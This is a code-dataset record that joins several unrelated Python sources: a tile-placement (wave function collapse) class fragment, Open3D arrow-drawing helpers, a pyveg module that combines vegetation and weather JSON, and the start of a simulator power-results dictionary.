        return self.check_match(self.tiles_array_probabilities[x][y].keys(), x, y)

    def check_match(self, available_tiles, x, y):
        """Intersect *available_tiles* with the constraints of decided neighbors.

        Returns a random tile from the intersection, or None on contradiction.
        """
        possible_list = []  # one constraint set per decided neighbor

        for px, py, direction in [(x + 0, y + 1, 'north'),
                                  (x + 1, y + 0, 'east'),
                                  (x + 0, y + (-1), 'south'),
                                  (x + (-1), y + 0, 'west')
                                  ]:
            ind, op_ind = helper_functions.find_opposite(direction)
            if self.check_coordinate_within_map(px, py):
                if self.tile_array[px][py] != 0:  # neighbor is decided
                    possible_list.append(self.matching_tile_data[self.tile_array[px][py]][op_ind])

        intersection = available_tiles
        for m in possible_list:
            intersection = intersection & set(m)

        if not intersection:
            print("Contradiction at (%s, %s)!" % (x, y))
            print("possible_list: ", possible_list)
            print("available_tiles: ", available_tiles)
            return None

        # A compatible tile exists; record the placement site and pick one.
        self.last_tile_changed = (x, y)
        return choice(list(intersection))

    def modify_probability(self, new_tile, op_index, i, j, x, y, px, py):
        """Collect the tiles that neighbor (px, py) allows at cell (i, j).

        Returns:
            (tiles, tile_type): a {tile: weight} dict and 'adjacent' when
            (px, py) holds a decided tile, 'probability' when it only has a
            possibility set, or ({}, '') when it constrains nothing.
        """
        # Decided neighbor: its side-matching data is authoritative.
        if self.tile_array[px][py] != 0:
            tile_type = 'adjacent'
            modified_probabilities = {tile: 1 for tile in self.matching_tile_data[self.tile_array[px][py]][op_index]}
        else:
            # Undecided neighbor: union of what each of its candidates allows.
            if not self.tiles_array_probabilities[px][py]:
                return {}, ''  # nothing to contribute
            tile_type = 'probability'
            modified_probabilities = {possible_tile: 1 for key in self.tiles_array_probabilities[px][py].keys()
                                      for possible_tile in self.matching_tile_data[key][op_index]}
        return modified_probabilities, tile_type

    def check_decided_neighbors(self, x, y):
        """Return True when every in-map neighbor of (x, y) is still undecided."""
        for new_x, new_y in [(x, y + 1), (x, y - 1), (x + 1, y), (x - 1, y)]:
            if not (new_x, new_y) in self.undecided_tiles:
                if self.check_coordinate_within_map(new_x, new_y):
                    return False  # at least one neighbor has been decided
        return True

    def check_coordinate_within_map(self, x, y):
        """Return True when (x, y) lies inside the map bounds."""
        return 0 <= x <= self.x_max - 1 and 0 <= y <= self.y_max - 1

    def reset_entropy(self) -> None:
        """Reset the lowest-entropy record to its sentinel value."""
        self.lowest_entropy = [(999, 999), 999]
        if self.gui.lbl_stats:
            self.gui.lbl_stats.text = 'Lowest Entropy|(%s, %s): %s' % (999, 999, 999)
7ae4b70795a408a9283f1cf36ea2d333aeba46c1 | 3,456 | py | Python | tools/visual_tools/open3d_arrow.py | AbangLZU/OpenPCDet | eeea3f24d392f692228c1ad4e28c0dc9d0e25665 | [
"Apache-2.0"
] | 29 | 2021-07-16T07:35:46.000Z | 2022-03-28T07:43:45.000Z | tools/visual_tools/open3d_arrow.py | AbangLZU/OpenPCDet | eeea3f24d392f692228c1ad4e28c0dc9d0e25665 | [
"Apache-2.0"
] | 1 | 2021-09-26T06:19:56.000Z | 2021-09-26T06:19:56.000Z | tools/visual_tools/open3d_arrow.py | AbangLZU/OpenPCDet | eeea3f24d392f692228c1ad4e28c0dc9d0e25665 | [
"Apache-2.0"
] | 12 | 2021-07-16T12:01:31.000Z | 2022-03-24T07:27:30.000Z | import open3d as o3d
import numpy as np
# def draw_geometries(pcds):
# """
# Draw Geometries
# Args:
# - pcds (): [pcd1,pcd2,...]
# """
# o3d.visualization.draw_geometries(pcds)
# def get_o3d_FOR(origin=[0, 0, 0], size=10):
# """
# Create a FOR that can be added to the open3d point cloud
# """
# mesh_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(size=size)
# mesh_frame.translate(origin)
# return mesh_frame
def vector_magnitude(vec):
    """Return the Euclidean length (L2 norm) of the array *vec*."""
    return np.sqrt((vec ** 2).sum())
def calculate_zy_rotation_for_arrow(vec):
    """Return (Rz, Ry) rotations that take the frame's z axis onto *vec*.

    The first rotation (about z) brings *vec* into the XZ plane; the second
    (about y) tilts the z axis onto the rotated vector, so that applying
    Rz @ Ry maps the original z axis into the direction of *vec*.
    """
    # Rotation about the z axis of the frame of reference.
    gamma = np.arctan(vec[1] / vec[0])
    cos_g, sin_g = np.cos(gamma), np.sin(gamma)
    Rz = np.array([[cos_g, -sin_g, 0],
                   [sin_g, cos_g, 0],
                   [0, 0, 1]])

    # Express vec in the z-rotated frame to compute the remaining tilt.
    rotated = (Rz.T @ vec.reshape(-1, 1)).reshape(-1)

    # Rotation about the y axis; the 1e-8 keeps the division finite when the
    # z component is zero.
    beta = np.arctan(rotated[0] / (rotated[2] + 1e-8))
    cos_b, sin_b = np.cos(beta), np.sin(beta)
    Ry = np.array([[cos_b, 0, sin_b],
                   [0, 1, 0],
                   [-sin_b, 0, cos_b]])
    return (Rz, Ry)
def get_arrow(scale=10):
    """Create an Open3D arrow mesh whose cone/cylinder heights scale with *scale*.

    NOTE(review): the radii are hard-coded (0.5 cone / 0.25 cylinder) rather
    than proportional to *scale*; the original computed scale-based radii but
    never used them (dead locals, removed here). Confirm whether fixed radii
    are the intended look before changing.
    """
    cone_height = scale * 0.2
    cylinder_height = scale * 0.8
    mesh_frame = o3d.geometry.TriangleMesh.create_arrow(
        cone_radius=0.5,
        cone_height=cone_height,
        cylinder_radius=0.25,
        cylinder_height=cylinder_height,
    )
    return mesh_frame
def create_arrow(origin=(0, 0, 0), end=None, color=(1, 0, 0), vec=None):
    """Create an arrow mesh from *origin* to *end*, or along *vec* from *origin*.

    Args:
        origin: start point [x, y, z] (defaults changed from mutable lists to
            tuples — an idiom fix; accepted values are unchanged).
        end: optional end point [x, y, z]; takes precedence over *vec*.
        color: RGB color applied uniformly to the mesh.
        vec: optional direction vector [i, j, k] used when *end* is None.

    Returns:
        An oriented, translated and colored Open3D arrow mesh. When neither
        *end* nor *vec* is given, a default arrow of scale 10 along z is
        produced.
    """
    scale = 10
    Ry = Rz = np.eye(3)  # identity rotations when no direction is supplied
    # (The original also built an unused 4x4 transform T — dead code, removed.)
    if end is not None:
        vec = np.array(end) - np.array(origin)
    elif vec is not None:
        vec = np.array(vec)
    # After the block above, vec is non-None iff a direction was supplied.
    if vec is not None:
        scale = vector_magnitude(vec)
        Rz, Ry = calculate_zy_rotation_for_arrow(vec)
    mesh = get_arrow(scale)
    # Orient the arrow: tilt about y first, then spin about z.
    mesh.rotate(Ry, center=np.array([0, 0, 0]))
    mesh.rotate(Rz, center=np.array([0, 0, 0]))
    mesh.translate(origin)
    mesh.paint_uniform_color(color)
    return mesh
# # Create a Cartesian Frame of Reference
# FOR = get_o3d_FOR()
# # Create an arrow from point (5,5,5) to point (10,10,10)
# arrow = get_arrow([5,5,5],[10,10,10])
# # Create an arrow representing vector vec, starting at (5,5,5)
# # arrow = get_arrow([5,5,5],vec=[5,5,5])
# # Create an arrow in the same place as the z axis
# # arrow = get_arrow()
# # Draw everything
# draw_geometries([FOR,arrow])
| 27.428571 | 86 | 0.596644 | import open3d as o3d
import numpy as np
# def draw_geometries(pcds):
# """
# Draw Geometries
# Args:
# - pcds (): [pcd1,pcd2,...]
# """
# o3d.visualization.draw_geometries(pcds)
# def get_o3d_FOR(origin=[0, 0, 0], size=10):
# """
# Create a FOR that can be added to the open3d point cloud
# """
# mesh_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(size=size)
# mesh_frame.translate(origin)
# return mesh_frame
def vector_magnitude(vec):
"""
Calculates a vector's magnitude.
Args:
- vec ():
"""
magnitude = np.sqrt(np.sum(vec ** 2))
return magnitude
def calculate_zy_rotation_for_arrow(vec):
"""
Calculates the rotations required to go from the vector vec to the
z axis vector of the original FOR. The first rotation that is
calculated is over the z axis. This will leave the vector vec on the
XZ plane. Then, the rotation over the y axis.
Returns the angles of rotation over axis z and y required to
get the vector vec into the same orientation as axis z
of the original FOR
Args:
- vec ():
"""
# Rotation over z axis of the FOR
gamma = np.arctan(vec[1] / vec[0])
Rz = np.array(
[
[np.cos(gamma), -np.sin(gamma), 0],
[np.sin(gamma), np.cos(gamma), 0],
[0, 0, 1],
]
)
# Rotate vec to calculate next rotation
vec = Rz.T @ vec.reshape(-1, 1)
vec = vec.reshape(-1)
# Rotation over y axis of the FOR
beta = np.arctan(vec[0] / (vec[2] + 1e-8))
Ry = np.array(
[[np.cos(beta), 0, np.sin(beta)], [0, 1, 0], [-np.sin(beta), 0, np.cos(beta)]]
)
return (Rz, Ry)
def get_arrow(scale=10):
"""
Create an arrow in for Open3D
"""
cone_height = scale * 0.2
cylinder_height = scale * 0.8
cone_radius = scale / 10
cylinder_radius = scale / 20
mesh_frame = o3d.geometry.TriangleMesh.create_arrow(
cone_radius=0.5,
cone_height=cone_height,
cylinder_radius=0.25,
cylinder_height=cylinder_height,
)
return mesh_frame
def create_arrow(origin=[0, 0, 0], end=None, color=[1, 0, 0], vec=None):
"""
Creates an arrow from an origin point to an end point,
or create an arrow from a vector vec starting from origin.
Args:
- end (): End point. [x,y,z]
- vec (): Vector. [i,j,k]
"""
scale = 10
Ry = Rz = np.eye(3)
T = np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])
T[:3, -1] = origin
if end is not None:
vec = np.array(end) - np.array(origin)
elif vec is not None:
vec = np.array(vec)
if end is not None or vec is not None:
scale = vector_magnitude(vec)
Rz, Ry = calculate_zy_rotation_for_arrow(vec)
mesh = get_arrow(scale)
# Create the arrow
mesh.rotate(Ry, center=np.array([0, 0, 0]))
mesh.rotate(Rz, center=np.array([0, 0, 0]))
mesh.translate(origin)
mesh.paint_uniform_color(color)
return mesh
# # Create a Cartesian Frame of Reference
# FOR = get_o3d_FOR()
# # Create an arrow from point (5,5,5) to point (10,10,10)
# arrow = get_arrow([5,5,5],[10,10,10])
# # Create an arrow representing vector vec, starting at (5,5,5)
# # arrow = get_arrow([5,5,5],vec=[5,5,5])
# # Create an arrow in the same place as the z axis
# # arrow = get_arrow()
# # Draw everything
# draw_geometries([FOR,arrow])
| 0 | 0 | 0 |
e7710191460ec558981dba0a6dd8d7d2c1cf33b3 | 12,043 | py | Python | pyveg/src/combiner_modules.py | usethedata/monitoring-ecosystem-resilience | 950d2c7b1d8cf6d5e022b490ebcd1753b90242e2 | [
"MIT"
] | 19 | 2019-10-03T11:07:55.000Z | 2022-03-03T09:16:00.000Z | pyveg/src/combiner_modules.py | usethedata/monitoring-ecosystem-resilience | 950d2c7b1d8cf6d5e022b490ebcd1753b90242e2 | [
"MIT"
] | 315 | 2019-10-04T15:32:22.000Z | 2020-11-09T16:37:30.000Z | pyveg/src/combiner_modules.py | usethedata/monitoring-ecosystem-resilience | 950d2c7b1d8cf6d5e022b490ebcd1753b90242e2 | [
"MIT"
] | 3 | 2020-06-30T14:06:19.000Z | 2022-03-27T06:22:18.000Z | """
Modules that can consolidate inputs from different sources
and produce combined output file (typically JSON).
"""
import os
import json
from pyveg.src.file_utils import save_json, get_tag
from pyveg.src.date_utils import get_date_strings_for_time_period
from pyveg.src.pyveg_pipeline import BaseModule, logger
class VegAndWeatherJsonCombiner(CombinerModule):
"""
Expect directory structures like:
<something>/<input_veg_location>/<date>/network_centralities.json
<something>/<input_weather_location>/RESULTS/weather_data.json
"""
def set_default_parameters(self):
"""
See if we can set our input directories from the output directories
of previous Sequences in the pipeline.
The pipeline (if there is one) will be a grandparent,
i.e. self.parent.parent
and the names of the Sequences we will want to combine should be
in the variable self.depends_on.
"""
super().set_default_parameters()
# get the parent Sequence and Pipeline
if self.parent and self.parent.parent:
# we're running in a Pipeline
for seq_name in self.parent.depends_on:
seq = self.parent.parent.get(seq_name)
if seq.data_type == "vegetation":
self.input_veg_sequence = seq_name
elif seq.data_type == "weather":
self.input_weather_sequence = seq_name
if not (
"input_veg_sequence" in vars(self)
and "input_weather_sequence" in vars(self)
):
raise RuntimeError(
"{}: Unable to find vegetation and weather sequences in depends_on".format(
self.name, self.depends_on
)
)
# now get other details from the input sequences
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
self.input_veg_location = veg_sequence.output_location
self.input_veg_location_type = veg_sequence.output_location_type
self.veg_collection = veg_sequence.collection_name
weather_sequence = self.parent.parent.get(self.input_weather_sequence)
self.input_weather_location = weather_sequence.output_location
self.input_weather_location_type = weather_sequence.output_location_type
self.weather_collection = weather_sequence.collection_name
else:
# No parent Sequence or Pipeline - perhaps running standalone
self.weather_collection = "ECMWF/ERA5/MONTHLY"
self.veg_collection = "COPERNICUS/S2"
self.input_veg_location_type = "local"
self.input_weather_location_type = "local"
self.output_location_type = "local"
if not "output_filename" in vars(self):
self.output_filename = "results_summary.json"
def combine_json_lists(self, json_lists):
"""
If for example we have json files from the NetworkCentrality
and NDVI calculators, all containing lists of dicts for sub-images,
combine them here by matching by coordinate.
"""
if len(json_lists) == 0:
return None
elif len(json_lists) == 1:
return json_lists[0]
## any way to do this without a huge nested loop?
# loop over all the lists apart from the first, which we will add to
for jlist in json_lists[1:]:
# loop through all items (sub-images) in each list
for p in jlist:
match_found = False
# loop through all items (sub-images) in the first/output list
for p0 in json_lists[0]:
# match by latitude, longitude.
if (p["latitude"], p["longitude"], p["date"]) == (
p0["latitude"],
p0["longitude"],
p0["date"],
):
match_found = True
for k, v in p.items():
if not k in p0.keys():
p0[k] = v
break
if not match_found:
json_lists[0].append(p)
return json_lists[0]
def get_veg_time_series(self):
"""
Combine contents of JSON files written by the NetworkCentrality
and NDVI calculator Modules.
If we are running in a Pipeline, get the expected set of date strings
from the vegetation sequence we depend on, and if there is no data
for a particular date, make a null entry in the output.
"""
dates_with_data = self.list_directory(
self.input_veg_location, self.input_veg_location_type
)
if self.parent and self.parent.parent and "input_veg_sequence" in vars(self):
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
start_date, end_date = veg_sequence.date_range
time_per_point = veg_sequence.time_per_point
date_strings = get_date_strings_for_time_period(
start_date, end_date, time_per_point
)
else:
date_strings = dates_with_data
date_strings.sort()
veg_time_series = {}
for date_string in date_strings:
if not date_string in dates_with_data:
veg_time_series[date_string] = None
# if there is no JSON directory for this date, add a null entry
if "JSON" not in self.list_directory(
self.join_path(self.input_veg_location, date_string),
self.input_veg_location_type,
):
veg_time_series[date_string] = None
continue
# find the subdirs of the JSON directory
subdirs = self.list_directory(
self.join_path(self.input_veg_location, date_string, "JSON"),
self.input_veg_location_type,
)
veg_lists = []
for subdir in subdirs:
logger.debug(
"{}: getting vegetation time series for {}".format(
self.name,
self.join_path(
self.input_veg_location, date_string, "JSON", subdir
),
)
)
# list the JSON subdirectories and find any .json files in them
dir_contents = self.list_directory(
self.join_path(self.input_veg_location, date_string, "JSON", subdir),
self.input_veg_location_type,
)
json_files = [
filename for filename in dir_contents if filename.endswith(".json")
]
for filename in json_files:
j = self.get_json(
self.join_path(
self.input_veg_location,
date_string,
"JSON",
subdir,
filename,
),
self.input_veg_location_type,
)
veg_lists.append(j)
# combine the lists from the different subdirectories
veg_time_point = self.combine_json_lists(veg_lists)
# update the final veg_time_series dictionary
veg_time_series[date_string] = veg_time_point
return veg_time_series
def check_output_dict(self, output_dict):
"""
For all the keys (i.e. dates) in the vegetation time-series,
count how many have data for both veg and weather
"""
veg_dates = output_dict[self.veg_collection]["time-series-data"].keys()
weather_dates = output_dict[self.weather_collection]["time-series-data"].keys()
for date in veg_dates:
if output_dict[self.veg_collection]["time-series-data"][date] \
and date in weather_dates \
and output_dict[self.weather_collection]["time-series-data"][date]:
self.run_status["succeeded"] += 1
return
def get_metadata(self):
"""
Fill a dictionary with info about this job - coords, date range etc.
"""
metadata = {}
if self.parent and self.parent.parent and "input_veg_sequence" in vars(self):
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
metadata["start_date"], metadata["end_date"] = veg_sequence.date_range
metadata["time_per_point"] = veg_sequence.time_per_point
metadata["longitude"] = veg_sequence.coords[0]
metadata["latitude"] = veg_sequence.coords[1]
metadata["collection"] = veg_sequence.collection_name
metadata["num_data_points"] = self.run_status["succeeded"]
if "config_filename" in vars(self.parent.parent):
metadata["config_filename"] = self.parent.parent.config_filename
if "coords_id" in vars(self.parent.parent):
metadata["coords_id"] = self.parent.parent.coords_id
if "pattern_type" in vars(self.parent.parent):
metadata["pattern_type"] = self.parent.parent.pattern_type
metadata["tag"] = get_tag()
return metadata
| 41.815972 | 95 | 0.578593 | """
Modules that can consolidate inputs from different sources
and produce combined output file (typically JSON).
"""
import os
import json
from pyveg.src.file_utils import save_json, get_tag
from pyveg.src.date_utils import get_date_strings_for_time_period
from pyveg.src.pyveg_pipeline import BaseModule, logger
class CombinerModule(BaseModule):
def __init__(self, name=None):
super().__init__(name)
self.params += [("output_location", [str]), ("output_location_type", [str])]
class VegAndWeatherJsonCombiner(CombinerModule):
"""
Expect directory structures like:
<something>/<input_veg_location>/<date>/network_centralities.json
<something>/<input_weather_location>/RESULTS/weather_data.json
"""
def __init__(self, name=None):
super().__init__(name)
self.params += [
("input_veg_location", [str]),
("input_weather_location", [str]),
("input_veg_location_type", [str]),
("input_weather_location_type", [str]),
("weather_collection", [str]),
("veg_collection", [str]),
("output_filename", [str]),
]
def set_default_parameters(self):
"""
See if we can set our input directories from the output directories
of previous Sequences in the pipeline.
The pipeline (if there is one) will be a grandparent,
i.e. self.parent.parent
and the names of the Sequences we will want to combine should be
in the variable self.depends_on.
"""
super().set_default_parameters()
# get the parent Sequence and Pipeline
if self.parent and self.parent.parent:
# we're running in a Pipeline
for seq_name in self.parent.depends_on:
seq = self.parent.parent.get(seq_name)
if seq.data_type == "vegetation":
self.input_veg_sequence = seq_name
elif seq.data_type == "weather":
self.input_weather_sequence = seq_name
if not (
"input_veg_sequence" in vars(self)
and "input_weather_sequence" in vars(self)
):
raise RuntimeError(
"{}: Unable to find vegetation and weather sequences in depends_on".format(
self.name, self.depends_on
)
)
# now get other details from the input sequences
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
self.input_veg_location = veg_sequence.output_location
self.input_veg_location_type = veg_sequence.output_location_type
self.veg_collection = veg_sequence.collection_name
weather_sequence = self.parent.parent.get(self.input_weather_sequence)
self.input_weather_location = weather_sequence.output_location
self.input_weather_location_type = weather_sequence.output_location_type
self.weather_collection = weather_sequence.collection_name
else:
# No parent Sequence or Pipeline - perhaps running standalone
self.weather_collection = "ECMWF/ERA5/MONTHLY"
self.veg_collection = "COPERNICUS/S2"
self.input_veg_location_type = "local"
self.input_weather_location_type = "local"
self.output_location_type = "local"
if not "output_filename" in vars(self):
self.output_filename = "results_summary.json"
def combine_json_lists(self, json_lists):
"""
If for example we have json files from the NetworkCentrality
and NDVI calculators, all containing lists of dicts for sub-images,
combine them here by matching by coordinate.
"""
if len(json_lists) == 0:
return None
elif len(json_lists) == 1:
return json_lists[0]
## any way to do this without a huge nested loop?
# loop over all the lists apart from the first, which we will add to
for jlist in json_lists[1:]:
# loop through all items (sub-images) in each list
for p in jlist:
match_found = False
# loop through all items (sub-images) in the first/output list
for p0 in json_lists[0]:
# match by latitude, longitude.
if (p["latitude"], p["longitude"], p["date"]) == (
p0["latitude"],
p0["longitude"],
p0["date"],
):
match_found = True
for k, v in p.items():
if not k in p0.keys():
p0[k] = v
break
if not match_found:
json_lists[0].append(p)
return json_lists[0]
def get_veg_time_series(self):
"""
Combine contents of JSON files written by the NetworkCentrality
and NDVI calculator Modules.
If we are running in a Pipeline, get the expected set of date strings
from the vegetation sequence we depend on, and if there is no data
for a particular date, make a null entry in the output.
"""
dates_with_data = self.list_directory(
self.input_veg_location, self.input_veg_location_type
)
if self.parent and self.parent.parent and "input_veg_sequence" in vars(self):
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
start_date, end_date = veg_sequence.date_range
time_per_point = veg_sequence.time_per_point
date_strings = get_date_strings_for_time_period(
start_date, end_date, time_per_point
)
else:
date_strings = dates_with_data
date_strings.sort()
veg_time_series = {}
for date_string in date_strings:
if not date_string in dates_with_data:
veg_time_series[date_string] = None
# if there is no JSON directory for this date, add a null entry
if "JSON" not in self.list_directory(
self.join_path(self.input_veg_location, date_string),
self.input_veg_location_type,
):
veg_time_series[date_string] = None
continue
# find the subdirs of the JSON directory
subdirs = self.list_directory(
self.join_path(self.input_veg_location, date_string, "JSON"),
self.input_veg_location_type,
)
veg_lists = []
for subdir in subdirs:
logger.debug(
"{}: getting vegetation time series for {}".format(
self.name,
self.join_path(
self.input_veg_location, date_string, "JSON", subdir
),
)
)
# list the JSON subdirectories and find any .json files in them
dir_contents = self.list_directory(
self.join_path(self.input_veg_location, date_string, "JSON", subdir),
self.input_veg_location_type,
)
json_files = [
filename for filename in dir_contents if filename.endswith(".json")
]
for filename in json_files:
j = self.get_json(
self.join_path(
self.input_veg_location,
date_string,
"JSON",
subdir,
filename,
),
self.input_veg_location_type,
)
veg_lists.append(j)
# combine the lists from the different subdirectories
veg_time_point = self.combine_json_lists(veg_lists)
# update the final veg_time_series dictionary
veg_time_series[date_string] = veg_time_point
return veg_time_series
def get_weather_time_series(self):
date_strings = self.list_directory(
self.input_weather_location, self.input_weather_location_type
)
date_strings.sort()
weather_time_series = {}
for date_string in date_strings:
weather_json = self.get_json(
self.join_path(
self.input_weather_location,
date_string,
"JSON",
"WEATHER",
"weather_data.json",
),
self.input_weather_location_type,
)
weather_time_series[date_string] = weather_json
return weather_time_series
def check_output_dict(self, output_dict):
"""
For all the keys (i.e. dates) in the vegetation time-series,
count how many have data for both veg and weather
"""
veg_dates = output_dict[self.veg_collection]["time-series-data"].keys()
weather_dates = output_dict[self.weather_collection]["time-series-data"].keys()
for date in veg_dates:
if output_dict[self.veg_collection]["time-series-data"][date] \
and date in weather_dates \
and output_dict[self.weather_collection]["time-series-data"][date]:
self.run_status["succeeded"] += 1
return
def get_metadata(self):
"""
Fill a dictionary with info about this job - coords, date range etc.
"""
metadata = {}
if self.parent and self.parent.parent and "input_veg_sequence" in vars(self):
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
metadata["start_date"], metadata["end_date"] = veg_sequence.date_range
metadata["time_per_point"] = veg_sequence.time_per_point
metadata["longitude"] = veg_sequence.coords[0]
metadata["latitude"] = veg_sequence.coords[1]
metadata["collection"] = veg_sequence.collection_name
metadata["num_data_points"] = self.run_status["succeeded"]
if "config_filename" in vars(self.parent.parent):
metadata["config_filename"] = self.parent.parent.config_filename
if "coords_id" in vars(self.parent.parent):
metadata["coords_id"] = self.parent.parent.coords_id
if "pattern_type" in vars(self.parent.parent):
metadata["pattern_type"] = self.parent.parent.pattern_type
metadata["tag"] = get_tag()
return metadata
def run(self):
self.check_config()
output_dict = {}
logger.info("{}: getting weather time series".format(self.name))
weather_time_series = self.get_weather_time_series()
output_dict[self.weather_collection] = {
"type": "weather",
"time-series-data": weather_time_series,
}
logger.info("{}: getting vegetation time series".format(self.name))
veg_time_series = self.get_veg_time_series()
output_dict[self.veg_collection] = {
"type": "vegetation",
"time-series-data": veg_time_series,
}
logger.info("{}: checking combined JSON".format(self.name))
self.check_output_dict(output_dict)
logger.info("{}: filling metadata dict".format(self.name))
metadata_dict = self.get_metadata()
output_dict["metadata"] = metadata_dict
self.save_json(
output_dict,
self.output_filename,
self.output_location,
self.output_location_type,
)
logger.info("{}: Wrote output to {}".format(
self.name,
self.join_path(self.output_location, self.output_filename)
)
)
self.is_finished = True
| 2,417 | 12 | 130 |
f47b46e0a3e2e6deb29327d0364675f56eb260ad | 68,621 | py | Python | benchmarks/SimResults/combinations_spec_pinned/cmp_bwavesgcccactusADMgromacs/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_pinned/cmp_bwavesgcccactusADMgromacs/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_pinned/cmp_bwavesgcccactusADMgromacs/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 5.66814e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202693,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.369616,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.64004,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.367081,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.37674,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.365347,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.59398,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0133989,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0968933,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0990927,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0968971,
'Execution Unit/Register Files/Runtime Dynamic': 0.112492,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.234135,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.601487,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.69879,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
